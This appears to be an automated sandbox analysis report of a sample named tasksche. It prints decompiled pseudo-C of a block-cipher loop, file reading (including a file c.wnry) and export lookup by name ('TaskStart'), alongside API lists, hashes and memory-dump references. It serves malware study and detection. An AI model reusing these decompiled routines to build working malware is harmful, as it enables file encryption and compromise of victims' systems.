				intOrPtr _t160;
				int _t161;
				int _t163;
				signed int _t164;
				signed int _t165;
				intOrPtr _t168;
				void* _t169;
				signed int _t170;
				signed int _t172;
				signed int _t175;
				signed int _t178;
				intOrPtr _t194;
				void* _t195;
				void* _t196;
				void* _t197;
				intOrPtr _t198;
				void* _t201;

				_t197 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v16);
					L0040776E();
				}
				_t121 = _a12;
				if(_t121 == 0) {
					L15:
					__imp__??0exception@@QAE@ABQBD@Z(0x40f574);
					_push(0x40d570);
					_push( &_v16);
					L0040776E();
					_push( &_v16);
					_push(0);
					_push(_t197);
					_t198 = _v36;
					_t194 = _v32;
					_t168 =  *((intOrPtr*)(_t198 + 0x30));
					_t160 =  *((intOrPtr*)(_t198 + 0x34));
					_t71 = _t194 + 0xc; // 0x40d568
					_v48 =  *_t71;
					_v32 = _t168;
					if(_t168 > _t160) {
						_t160 =  *((intOrPtr*)(_t198 + 0x2c));
					}
					_t75 = _t194 + 0x10; // 0x19930520
					_t124 =  *_t75;
					_t161 = _t160 - _t168;
					if(_t161 > _t124) {
						_t161 = _t124;
					}
					if(_t161 != 0 && _a8 == 0xfffffffb) {
						_a8 = _a8 & 0x00000000;
					}
					 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t161;
					 *(_t194 + 0x10) = _t124 - _t161;
					_t126 =  *((intOrPtr*)(_t198 + 0x38));
					if(_t126 != 0) {
						_t137 =  *_t126( *((intOrPtr*)(_t198 + 0x3c)), _t168, _t161);
						 *((intOrPtr*)(_t198 + 0x3c)) = _t137;
						_t201 = _t201 + 0xc;
						 *((intOrPtr*)(_t194 + 0x30)) = _t137;
					}
					if(_t161 != 0) {
						memcpy(_v12, _a4, _t161);
						_v12 = _v12 + _t161;
						_t201 = _t201 + 0xc;
						_a4 = _a4 + _t161;
					}
					_t127 =  *((intOrPtr*)(_t198 + 0x2c));
					if(_a4 == _t127) {
						_t169 =  *((intOrPtr*)(_t198 + 0x28));
						_a4 = _t169;
						if( *((intOrPtr*)(_t198 + 0x34)) == _t127) {
							 *((intOrPtr*)(_t198 + 0x34)) = _t169;
						}
						_t99 = _t194 + 0x10; // 0x19930520
						_t131 =  *_t99;
						_t163 =  *((intOrPtr*)(_t198 + 0x34)) - _t169;
						if(_t163 > _t131) {
							_t163 = _t131;
						}
						if(_t163 != 0 && _a8 == 0xfffffffb) {
							_a8 = _a8 & 0x00000000;
						}
						 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t163;
						 *(_t194 + 0x10) = _t131 - _t163;
						_t133 =  *((intOrPtr*)(_t198 + 0x38));
						if(_t133 != 0) {
							_t135 =  *_t133( *((intOrPtr*)(_t198 + 0x3c)), _t169, _t163);
							 *((intOrPtr*)(_t198 + 0x3c)) = _t135;
							_t201 = _t201 + 0xc;
							 *((intOrPtr*)(_t194 + 0x30)) = _t135;
						}
						if(_t163 != 0) {
							memcpy(_v12, _a4, _t163);
							_v12 = _v12 + _t163;
							_a4 = _a4 + _t163;
						}
					}
					 *(_t194 + 0xc) = _v12;
					 *((intOrPtr*)(_t198 + 0x30)) = _a4;
					return _a8;
				} else {
					_t170 =  *(_t197 + 0x3cc);
					if(_t121 % _t170 != 0) {
						goto L15;
					} else {
						if(_a16 != 1) {
							_t195 = _a4;
							_t139 = _a12;
							_a16 = 0;
							_t164 = _a8;
							if(_a16 != 2) {
								_t140 = _t139 / _t170;
								if(_t140 > 0) {
									do {
										E00403797(_t197, _t195, _t164);
										_t172 =  *(_t197 + 0x3cc);
										_t195 = _t195 + _t172;
										_t143 = _a12 / _t172;
										_t164 = _t164 + _t172;
										_a16 = _a16 + 1;
									} while (_a16 < _t143);
									return _t143;
								}
							} else {
								_t140 = _t139 / _t170;
								if(_t140 > 0) {
									do {
										E0040350F(_t197, _t197 + 0x3f0, _t164);
										E00403A28(_t197, _t164, _t195);
										memcpy(_t197 + 0x3f0, _t195,  *(_t197 + 0x3cc));
										_t175 =  *(_t197 + 0x3cc);
										_t201 = _t201 + 0xc;
										_t150 = _a12 / _t175;
										_t195 = _t195 + _t175;
										_t164 = _t164 + _t175;
										_a16 = _a16 + 1;
									} while (_a16 < _t150);
									return _t150;
								}
							}
						} else {
							_t196 = _a4;
							_t140 = _a12 / _t170;
							_a16 = 0;
							_t165 = _a8;
							if(_t140 > 0) {
								do {
									E00403797(_t197, _t196, _t165);
									E00403A28(_t197, _t165, _t197 + 0x3f0);
									memcpy(_t197 + 0x3f0, _t196,  *(_t197 + 0x3cc));
									_t178 =  *(_t197 + 0x3cc);
									_t201 = _t201 + 0xc;
									_t140 = _a12 / _t178;
									_t196 = _t196 + _t178;
									_t165 = _t165 + _t178;
									_a16 = _a16 + 1;
								} while (_a16 < _t140);
							}
						}
						return _t140;
					}
				}
			}





































                                                                                                                                                0x00403a7f
                                                                                                                                                0x00403a87
                                                                                                                                                0x00403a91
                                                                                                                                                0x00403a9a
                                                                                                                                                0x00403a9f
                                                                                                                                                0x00403aa0
                                                                                                                                                0x00403aa0
                                                                                                                                                0x00403aa5
                                                                                                                                                0x00403aaa
                                                                                                                                                0x00403bba
                                                                                                                                                0x00403bc2
                                                                                                                                                0x00403bcb
                                                                                                                                                0x00403bd0
                                                                                                                                                0x00403bd1
                                                                                                                                                0x00403bd9
                                                                                                                                                0x00403bda
                                                                                                                                                0x00403bdb
                                                                                                                                                0x00403bdc
                                                                                                                                                0x00403be0
                                                                                                                                                0x00403be3
                                                                                                                                                0x00403be6
                                                                                                                                                0x00403be9
                                                                                                                                                0x00403bee
                                                                                                                                                0x00403bf1
                                                                                                                                                0x00403bf4
                                                                                                                                                0x00403bf6
                                                                                                                                                0x00403bf6
                                                                                                                                                0x00403bf9
                                                                                                                                                0x00403bf9
                                                                                                                                                0x00403bfc
                                                                                                                                                0x00403c00
                                                                                                                                                0x00403c02
                                                                                                                                                0x00403c02
                                                                                                                                                0x00403c06
                                                                                                                                                0x00403c0e
                                                                                                                                                0x00403c0e
                                                                                                                                                0x00403c12
                                                                                                                                                0x00403c17
                                                                                                                                                0x00403c1a
                                                                                                                                                0x00403c1f
                                                                                                                                                0x00403c26
                                                                                                                                                0x00403c28
                                                                                                                                                0x00403c2b
                                                                                                                                                0x00403c2e
                                                                                                                                                0x00403c2e
                                                                                                                                                0x00403c33
                                                                                                                                                0x00403c3c
                                                                                                                                                0x00403c41
                                                                                                                                                0x00403c44
                                                                                                                                                0x00403c47
                                                                                                                                                0x00403c47
                                                                                                                                                0x00403c4a
                                                                                                                                                0x00403c50
                                                                                                                                                0x00403c52
                                                                                                                                                0x00403c58
                                                                                                                                                0x00403c5b
                                                                                                                                                0x00403c5d
                                                                                                                                                0x00403c5d
                                                                                                                                                0x00403c63
                                                                                                                                                0x00403c63
                                                                                                                                                0x00403c66
                                                                                                                                                0x00403c6a
                                                                                                                                                0x00403c6c
                                                                                                                                                0x00403c6c
                                                                                                                                                0x00403c70
                                                                                                                                                0x00403c78
                                                                                                                                                0x00403c78
                                                                                                                                                0x00403c7c
                                                                                                                                                0x00403c81
                                                                                                                                                0x00403c84
                                                                                                                                                0x00403c89
                                                                                                                                                0x00403c90
                                                                                                                                                0x00403c92
                                                                                                                                                0x00403c95
                                                                                                                                                0x00403c98
                                                                                                                                                0x00403c98
                                                                                                                                                0x00403c9d
                                                                                                                                                0x00403ca6
                                                                                                                                                0x00403cab
                                                                                                                                                0x00403cb1
                                                                                                                                                0x00403cb1
                                                                                                                                                0x00403c9d
                                                                                                                                                0x00403cb7
                                                                                                                                                0x00403cbd
                                                                                                                                                0x00403cc7
                                                                                                                                                0x00403ab0
                                                                                                                                                0x00403ab0
                                                                                                                                                0x00403abc
                                                                                                                                                0x00000000
                                                                                                                                                0x00403ac2
                                                                                                                                                0x00403ac6
                                                                                                                                                0x00403b2c
                                                                                                                                                0x00403b2f
                                                                                                                                                0x00403b32
                                                                                                                                                0x00403b35
                                                                                                                                                0x00403b38
                                                                                                                                                0x00403b8d
                                                                                                                                                0x00403b91
                                                                                                                                                0x00403b93
                                                                                                                                                0x00403b97
                                                                                                                                                0x00403b9c
                                                                                                                                                0x00403ba7
                                                                                                                                                0x00403ba9
                                                                                                                                                0x00403bab
                                                                                                                                                0x00403bad
                                                                                                                                                0x00403bb0
                                                                                                                                                0x00000000
                                                                                                                                                0x00403b93
                                                                                                                                                0x00403b3a
                                                                                                                                                0x00403b3c
                                                                                                                                                0x00403b40
                                                                                                                                                0x00403b42
                                                                                                                                                0x00403b4c
                                                                                                                                                0x00403b55
                                                                                                                                                0x00403b68
                                                                                                                                                0x00403b6d
                                                                                                                                                0x00403b78
                                                                                                                                                0x00403b7b
                                                                                                                                                0x00403b7d
                                                                                                                                                0x00403b7f
                                                                                                                                                0x00403b81
                                                                                                                                                0x00403b84
                                                                                                                                                0x00000000
                                                                                                                                                0x00403b42
                                                                                                                                                0x00403b40
                                                                                                                                                0x00403ac8
                                                                                                                                                0x00403acb
                                                                                                                                                0x00403ace
                                                                                                                                                0x00403ad0
                                                                                                                                                0x00403ad3
                                                                                                                                                0x00403ad8
                                                                                                                                                0x00403ada
                                                                                                                                                0x00403ade
                                                                                                                                                0x00403aed
                                                                                                                                                0x00403b00
                                                                                                                                                0x00403b05
                                                                                                                                                0x00403b10
                                                                                                                                                0x00403b13
                                                                                                                                                0x00403b15
                                                                                                                                                0x00403b17
                                                                                                                                                0x00403b19
                                                                                                                                                0x00403b1c
                                                                                                                                                0x00403ada
                                                                                                                                                0x00403ad8
                                                                                                                                                0x00403b25
                                                                                                                                                0x00403b25
                                                                                                                                                0x00403abc

                                                                                                                                                APIs
                                                                                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00000001), ref: 00403A91
                                                                                                                                                • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403AA0
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B00
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B68
                                                                                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F574,?,?,?,?,?,00000001), ref: 00403BC2
                                                                                                                                                • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403BD1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??0exception@@ExceptionThrowmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2382887404-0
                                                                                                                                                • Opcode ID: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
                                                                                                                                                • Instruction ID: 9805a50700f74263afb1320d00d27f30e93ca80038ec105a2d2f515762341bf2
                                                                                                                                                • Opcode Fuzzy Hash: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
                                                                                                                                                • Instruction Fuzzy Hash: 8541C870B40206ABDB14DE65DD81D9B77BEEB84309B00443FF815B3281D778AB15C759
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • fopen.MSVCRT(c.wnry,0040E018), ref: 0040101B
                                                                                                                                                • fread.MSVCRT(?,0000030C,00000001,00000000), ref: 0040103F
                                                                                                                                                • fwrite.MSVCRT(?,0000030C,00000001,00000000), ref: 00401047
                                                                                                                                                • fclose.MSVCRT(00000000), ref: 00401058
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: fclosefopenfreadfwrite
                                                                                                                                                • String ID: c.wnry
                                                                                                                                                • API String ID: 4000964834-3240288721
                                                                                                                                                • Opcode ID: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
                                                                                                                                                • Instruction ID: 4fc4ee2583eead98f325da0eb4a8e2a7a7827d82b7f69226d67b1691b23a23d5
                                                                                                                                                • Opcode Fuzzy Hash: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
                                                                                                                                                • Instruction Fuzzy Hash: 0CF05931204260ABCA301F656D4AA277B10DBC4F61F10083FF1C1F40E2CABD44C296BE
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 004018F9 Relevance: 7.6, APIs: 5, Instructions: 79filememoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 24%
                                                                                                                                                			E004018F9(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				struct _OVERLAPPED* _v8;
				char _v20;
				long _v32;
				struct _OVERLAPPED* _v36;
				long _v40;
				signed int _v44;
				void* _t18;
				void* _t28;
				long _t34;
				intOrPtr _t38;

				_push(0xffffffff);
				_push(0x4081f0);
				_push(0x4076f4);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t38;
				_v44 = _v44 | 0xffffffff;
				_v32 = 0;
				_v36 = 0;
				_v8 = 0;
				_t18 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
				_v44 = _t18;
				if(_t18 != 0xffffffff) {
					_t34 = GetFileSize(_t18, 0);
					_v40 = _t34;
					if(_t34 != 0xffffffff && _t34 <= 0x19000) {
						_t28 = GlobalAlloc(0, _t34);
						_v36 = _t28;
						if(_t28 != 0 && ReadFile(_v44, _t28, _t34,  &_v32, 0) != 0) {
							_push(_a8);
							_push(0);
							_push(0);
							_push(_v32);
							_push(_t28);
							_push(_a4);
							if( *0x40f898() != 0) {
								_push(1);
								_pop(0);
							}
						}
					}
				}
				_push(0xffffffff);
				_push( &_v20);
				L004076FA();
				 *[fs:0x0] = _v20;
				return 0;
			}













                                                                                                                                                0x004018fc
                                                                                                                                                0x004018fe
                                                                                                                                                0x00401903
                                                                                                                                                0x0040190e
                                                                                                                                                0x0040190f
                                                                                                                                                0x0040191c
                                                                                                                                                0x00401922
                                                                                                                                                0x00401925
                                                                                                                                                0x00401928
                                                                                                                                                0x0040193a
                                                                                                                                                0x00401940
                                                                                                                                                0x00401946
                                                                                                                                                0x00401950
                                                                                                                                                0x00401952
                                                                                                                                                0x00401958
                                                                                                                                                0x0040196a
                                                                                                                                                0x0040196c
                                                                                                                                                0x00401971
                                                                                                                                                0x00401987
                                                                                                                                                0x0040198a
                                                                                                                                                0x0040198b
                                                                                                                                                0x0040198c
                                                                                                                                                0x0040198f
                                                                                                                                                0x00401990
                                                                                                                                                0x0040199b
                                                                                                                                                0x0040199d
                                                                                                                                                0x0040199f
                                                                                                                                                0x0040199f
                                                                                                                                                0x0040199b
                                                                                                                                                0x00401971
                                                                                                                                                0x00401958
                                                                                                                                                0x004019a0
                                                                                                                                                0x004019a5
                                                                                                                                                0x004019a6
                                                                                                                                                0x004019d5
                                                                                                                                                0x004019e0

                                                                                                                                                APIs
                                                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040193A
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040194A
                                                                                                                                                • GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 00401964
                                                                                                                                                • ReadFile.KERNEL32(000000FF,00000000,00000000,?,00000000,?,?,?,?,?,?,00401448,?), ref: 0040197D
                                                                                                                                                • _local_unwind2.MSVCRT(?,000000FF,?,?,?,?,?,?,00401448,?), ref: 004019A6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$AllocCreateGlobalReadSize_local_unwind2
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2811923685-0
                                                                                                                                                • Opcode ID: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
                                                                                                                                                • Instruction ID: fb063a64e2dc49fc25d010f75d45645ced701e765f932c996de96a45c5b9f027
                                                                                                                                                • Opcode Fuzzy Hash: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
                                                                                                                                                • Instruction Fuzzy Hash: B62160B1901624AFCB209B99CD48FDF7E78EB097B0F54022AF525B22E0D7785805C6AC
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00405BAE Relevance: 6.1, APIs: 4, Instructions: 93fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 97%
                                                                                                                                                			E00405BAE(CHAR* _a4, intOrPtr _a8, long _a12, void* _a16) {
				char _v5;
				char _v6;
				long _t30;
				char _t32;
				long _t34;
				void* _t46;
				intOrPtr* _t49;
				long _t50;

				_t30 = _a12;
				if(_t30 == 1 || _t30 == 2 || _t30 == 3) {
					_t49 = _a16;
					_t46 = 0;
					_v6 = 0;
					 *_t49 = 0;
					_v5 = 0;
					if(_t30 == 1) {
						_t46 = _a4;
						_v5 = 0;
						L11:
						_t30 = SetFilePointer(_t46, 0, 0, 1);
						_v6 = _t30 != 0xffffffff;
						L12:
						_push(0x20);
						L00407700();
						_t50 = _t30;
						if(_a12 == 1 || _a12 == 2) {
							 *_t50 = 1;
							 *((char*)(_t50 + 0x10)) = _v5;
							_t32 = _v6;
							 *((char*)(_t50 + 1)) = _t32;
							 *(_t50 + 4) = _t46;
							 *((char*)(_t50 + 8)) = 0;
							 *((intOrPtr*)(_t50 + 0xc)) = 0;
							if(_t32 != 0) {
								 *((intOrPtr*)(_t50 + 0xc)) = SetFilePointer(_t46, 0, 0, 1);
							}
						} else {
							 *_t50 = 0;
							 *((intOrPtr*)(_t50 + 0x14)) = _a4;
							 *((char*)(_t50 + 1)) = 1;
							 *((char*)(_t50 + 0x10)) = 0;
							 *((intOrPtr*)(_t50 + 0x18)) = _a8;
							 *((intOrPtr*)(_t50 + 0x1c)) = 0;
							 *((intOrPtr*)(_t50 + 0xc)) = 0;
						}
						 *_a16 = 0;
						_t34 = _t50;
						goto L18;
					}
					if(_t30 != 2) {
						goto L12;
					}
					_t46 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
					if(_t46 != 0xffffffff) {
						_v5 = 1;
						goto L11;
					}
					 *_t49 = 0x200;
					goto L8;
				} else {
					 *_a16 = 0x10000;
					L8:
					_t34 = 0;
					L18:
					return _t34;
				}
			}











                                                                                                                                                0x00405bb2
                                                                                                                                                0x00405bbb
                                                                                                                                                0x00405bd2
                                                                                                                                                0x00405bd7
                                                                                                                                                0x00405bdc
                                                                                                                                                0x00405bdf
                                                                                                                                                0x00405be1
                                                                                                                                                0x00405be4
                                                                                                                                                0x00405c18
                                                                                                                                                0x00405c1b
                                                                                                                                                0x00405c24
                                                                                                                                                0x00405c29
                                                                                                                                                0x00405c32
                                                                                                                                                0x00405c36
                                                                                                                                                0x00405c36
                                                                                                                                                0x00405c38
                                                                                                                                                0x00405c42
                                                                                                                                                0x00405c44
                                                                                                                                                0x00405c6c
                                                                                                                                                0x00405c6f
                                                                                                                                                0x00405c72
                                                                                                                                                0x00405c77
                                                                                                                                                0x00405c7a
                                                                                                                                                0x00405c7d
                                                                                                                                                0x00405c80
                                                                                                                                                0x00405c83
                                                                                                                                                0x00405c90
                                                                                                                                                0x00405c90
                                                                                                                                                0x00405c4c
                                                                                                                                                0x00405c4f
                                                                                                                                                0x00405c51
                                                                                                                                                0x00405c57
                                                                                                                                                0x00405c5b
                                                                                                                                                0x00405c5e
                                                                                                                                                0x00405c61
                                                                                                                                                0x00405c64
                                                                                                                                                0x00405c64
                                                                                                                                                0x00405c96
                                                                                                                                                0x00405c98
                                                                                                                                                0x00000000
                                                                                                                                                0x00405c98
                                                                                                                                                0x00405be9
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00405c04
                                                                                                                                                0x00405c09
                                                                                                                                                0x00405c20
                                                                                                                                                0x00000000
                                                                                                                                                0x00405c20
                                                                                                                                                0x00405c0b
                                                                                                                                                0x00000000
                                                                                                                                                0x00405bc7
                                                                                                                                                0x00405bca
                                                                                                                                                0x00405c11
                                                                                                                                                0x00405c11
                                                                                                                                                0x00405c9a
                                                                                                                                                0x00405c9e
                                                                                                                                                0x00405c9e

                                                                                                                                                APIs
                                                                                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001), ref: 00405BFE
                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000), ref: 00405C29
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000020,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000,004020D5,?), ref: 00405C38
                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA), ref: 00405C8A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Pointer$??2@Create
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1331958074-0
                                                                                                                                                • Opcode ID: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
                                                                                                                                                • Instruction ID: 771dcc1d5a31089dd4cc2aab62cbbe5a226dda330bf0289da8f54b52fc8588cb
                                                                                                                                                • Opcode Fuzzy Hash: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
                                                                                                                                                • Instruction Fuzzy Hash: 0831F231008784AFDB318F28888479BBBF4EF15350F18896EF491A7380C375AD85CB69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00402924 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                			E00402924(intOrPtr* _a4, char _a8) {
				intOrPtr _v8;
				intOrPtr* _t26;
				intOrPtr* _t28;
				void* _t29;
				intOrPtr _t30;
				void* _t32;
				signed int _t33;
				signed int _t37;
				signed short* _t41;
				intOrPtr _t44;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				void* _t59;

				_t26 = _a4;
				_t44 =  *((intOrPtr*)(_t26 + 4));
				_t28 =  *_t26 + 0x78;
				_v8 = _t44;
				if( *((intOrPtr*)(_t28 + 4)) == 0) {
					L11:
					SetLastError(0x7f);
					_t29 = 0;
				} else {
					_t58 =  *_t28;
					_t30 =  *((intOrPtr*)(_t58 + _t44 + 0x18));
					_t59 = _t58 + _t44;
					if(_t30 == 0 ||  *((intOrPtr*)(_t59 + 0x14)) == 0) {
						goto L11;
					} else {
						_t8 =  &_a8; // 0x402150
						if( *_t8 >> 0x10 != 0) {
							_t55 =  *((intOrPtr*)(_t59 + 0x20)) + _t44;
							_t41 =  *((intOrPtr*)(_t59 + 0x24)) + _t44;
							_a4 = 0;
							if(_t30 <= 0) {
								goto L11;
							} else {
								while(1) {
									_t32 =  *_t55 + _t44;
									_t15 =  &_a8; // 0x402150
									__imp___stricmp( *_t15, _t32);
									if(_t32 == 0) {
										break;
									}
									_a4 = _a4 + 1;
									_t55 = _t55 + 4;
									_t41 =  &(_t41[1]);
									if(_a4 <  *((intOrPtr*)(_t59 + 0x18))) {
										_t44 = _v8;
										continue;
									} else {
										goto L11;
									}
									goto L12;
								}
								_t33 =  *_t41 & 0x0000ffff;
								_t44 = _v8;
								goto L14;
							}
						} else {
							_t9 =  &_a8; // 0x402150
							_t37 =  *_t9 & 0x0000ffff;
							_t49 =  *((intOrPtr*)(_t59 + 0x10));
							if(_t37 < _t49) {
								goto L11;
							} else {
								_t33 = _t37 - _t49;
								L14:
								if(_t33 >  *((intOrPtr*)(_t59 + 0x14))) {
									goto L11;
								} else {
									_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x1c)) + _t33 * 4 + _t44)) + _t44;
								}
							}
						}
					}
				}
				L12:
				return _t29;
			}

















                                                                                                                                                0x00402928
                                                                                                                                                0x0040292f
                                                                                                                                                0x00402934
                                                                                                                                                0x00402938
                                                                                                                                                0x0040293e
                                                                                                                                                0x004029a5
                                                                                                                                                0x004029a7
                                                                                                                                                0x004029ad
                                                                                                                                                0x00402940
                                                                                                                                                0x00402940
                                                                                                                                                0x00402942
                                                                                                                                                0x00402946
                                                                                                                                                0x0040294a
                                                                                                                                                0x00000000
                                                                                                                                                0x00402951
                                                                                                                                                0x00402951
                                                                                                                                                0x0040295a
                                                                                                                                                0x00402971
                                                                                                                                                0x00402973
                                                                                                                                                0x00402977
                                                                                                                                                0x0040297a
                                                                                                                                                0x00000000
                                                                                                                                                0x0040297c
                                                                                                                                                0x00402981
                                                                                                                                                0x00402983
                                                                                                                                                0x00402986
                                                                                                                                                0x00402989
                                                                                                                                                0x00402993
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00402995
                                                                                                                                                0x00402998
                                                                                                                                                0x0040299f
                                                                                                                                                0x004029a3
                                                                                                                                                0x0040297e
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004029a3
                                                                                                                                                0x004029b4
                                                                                                                                                0x004029b7
                                                                                                                                                0x00000000
                                                                                                                                                0x004029b7
                                                                                                                                                0x0040295c
                                                                                                                                                0x0040295c
                                                                                                                                                0x0040295c
                                                                                                                                                0x00402960
                                                                                                                                                0x00402965
                                                                                                                                                0x00000000
                                                                                                                                                0x00402967
                                                                                                                                                0x00402967
                                                                                                                                                0x004029ba
                                                                                                                                                0x004029bd
                                                                                                                                                0x00000000
                                                                                                                                                0x004029bf
                                                                                                                                                0x004029c8
                                                                                                                                                0x004029c8
                                                                                                                                                0x004029bd
                                                                                                                                                0x00402965
                                                                                                                                                0x0040295a
                                                                                                                                                0x0040294a
                                                                                                                                                0x004029af
                                                                                                                                                0x004029b3

                                                                                                                                                APIs
                                                                                                                                                • _stricmp.MSVCRT(P!@,?,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 00402989
